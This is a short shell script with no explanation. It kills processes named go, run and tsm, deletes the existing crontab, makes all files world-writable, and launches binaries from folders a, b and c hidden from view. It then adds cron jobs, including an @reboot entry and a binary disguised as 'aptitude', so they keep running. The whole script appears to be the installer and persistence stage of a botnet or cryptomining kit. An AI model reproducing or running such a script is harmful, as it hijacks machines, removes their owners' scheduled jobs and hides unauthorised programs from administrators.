pkill -9 go> .out
pkill -9 run> .out
pkill -9 tsm> .out
kill -9 `ps x|grep run|grep -v grep|awk '{print $1}'`> .out
kill -9 `ps x|grep go|grep -v grep|awk '{print $1}'`> .out
kill -9 `ps x|grep tsm|grep -v grep|awk '{print $1}'`> .out

pwd > dir.dir
dir=$(cat dir.dir)
crontab -r
cd $dir
chmod 777 *

rm -rf cron.d
cd a
nohup ./init0 >> /dev/null &
sleep 5s
nohup ./a >>/dev/null &
cd ..
cd b
nohup ./a >>/dev/null &
cd ..
cd c
nohup ./start >>/dev/null &
cd ..
cd $dir
#* */12 * * *
echo "1 1 */2 * * $dir/a/upd>/dev/null 2>&1
5 8 * * 0 $dir/b/sync>/dev/null 2>&1 
@reboot $dir/b/sync>/dev/null 2>&1  
0 0 */3 * * $dir/c/aptitude>/dev/null 2>&1" >> cron.d

sleep 3s

crontab cron.d
crontab -l

